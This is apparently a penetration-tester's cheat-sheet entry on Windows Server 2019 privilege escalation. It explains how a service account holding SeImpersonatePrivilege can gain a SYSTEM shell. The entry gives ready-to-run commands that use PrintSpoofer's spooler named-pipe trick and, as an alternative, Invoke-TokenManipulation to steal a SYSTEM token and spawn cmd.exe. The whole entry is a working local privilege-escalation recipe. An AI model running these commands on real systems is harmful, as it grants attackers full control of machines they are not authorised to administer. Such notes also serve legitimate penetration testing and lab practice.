PrintSpoofer Privesc (Windows Server 2019)
privescwindowstool
Summary
Abuse SeImpersonatePrivilege on Windows Server 2019 with PrintSpoofer to spawn an interactive SYSTEM process; Invoke-TokenManipulation is an alternative.
Walkthrough
When a service account holds SeImpersonatePrivilege (common for IIS/MSSQL), PrintSpoofer abuses the spooler named pipe to impersonate SYSTEM.
Steps
- Run
PrintSpoofer32.exe -i -c cmd.exe(orpowershell.exe) to get an interactive SYSTEM shell in your current session. - As an alternative, import
Invoke-TokenManipulation.ps1and use-CreateProcess "cmd.exe" -ImpersonateUser "NT AUTHORITY\SYSTEM"to spawn a process under a stolen SYSTEM token.
Commands
cmd
PrintSpoofer32.exe -i -c cmd.exe
powershell
Import-Module .\Invoke-TokenManipulation.ps1 Invoke-TokenManipulation -CreateProcess "cmd.exe" -ImpersonateUser "NT AUTHORITY\SYSTEM"